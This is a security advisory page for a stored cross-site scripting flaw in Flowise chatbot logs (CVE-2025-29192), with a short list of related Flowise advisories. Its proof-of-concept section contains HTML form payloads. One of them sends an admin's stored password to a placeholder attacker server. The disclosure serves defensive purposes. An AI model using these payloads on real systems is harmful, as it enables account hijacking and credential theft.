Skip to content
FlowiseGHSA-7r4h-vmj9-wg42

Flowise Stored XSS vulnerability through logs in chatbot

Medium5.3CVE-2025-29192 · Published Oct 3, 2025 · updated Jul 8, 2026

GitHub advisory

Affected versions

PackageAffectedFixed in
flowise
npm
< 3.0.53.0.5
Details and references

### Description In the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin's credentials or sensitive information with stored Cross Site Scripting. ### PoC ```html <form> <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:alert('XSS!!!');" /> </form> ``` If the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts ‘XSS!!!’. It means stored xss is able in the chatbot. ```html <form> <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:window.location.href='<YOUR_REQUESTBIN_SERVER>?passwd=' + encodeURIComponent(localStorage.getItem('password'));" /> </form> ``` So when an admin clicks the img that generated by above html code, it sends a request, including credentials, to the attacker's IP. If attacker steal admin’s token, attacker can login as the admin in the apps. ### Poc Video [poc](https://drive.google.com/file/d/1_3HwU0MxZ4HfJqpx2mOBjxf-WSCMM_4o/view?usp=sharing) ### Impact An attacker could hijack an admin account in published chatbot. This can allow attacker to view chat logs of other users and API keys.

CVSS 3.1
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
Severity from
GitHub (reviewed advisory)
Weakness
CWE-79
Also known as
CVE-2025-29192

More Flowise advisories

All Flowise
DateAdvisory
Oct 32025Flowise vulnerable to XSS
CVE-2025-71331Mediumfixed in 3.0.8
Oct 32025Flowise is vulnerable to stored XSS via "View Messages" allows credential theft in FlowiseAI admin panel
CVE-2025-50538Critical9.3fixed in 3.0.8
Oct 62025Flowise vulnerable to RCE via Dynamic function constructor injection
CVE-2025-55346Critical9.8no fix yet
Oct 82025FlowiseAI/Flosise has File Upload vulnerability
CVE-2025-61687High8.3fixed in 3.0.8
Oct 92025Flowise is vulnerable to arbitrary file write through its WriteFileTool
CVE-2025-61913Critical9.9fixed in 3.0.8
Oct 102025Flowise is vulnerable to arbitrary file exposure through its ReadFileTool
GHSA-j44m-5v8f-gc9cHigh7.7fixed in 3.0.8

Critical advisories by email

Wednesdays: the week’s critical and high advisories in the AI and data stack, with the fixed versions. Only in weeks that have some.

Double opt-in. Unsubscribe any time.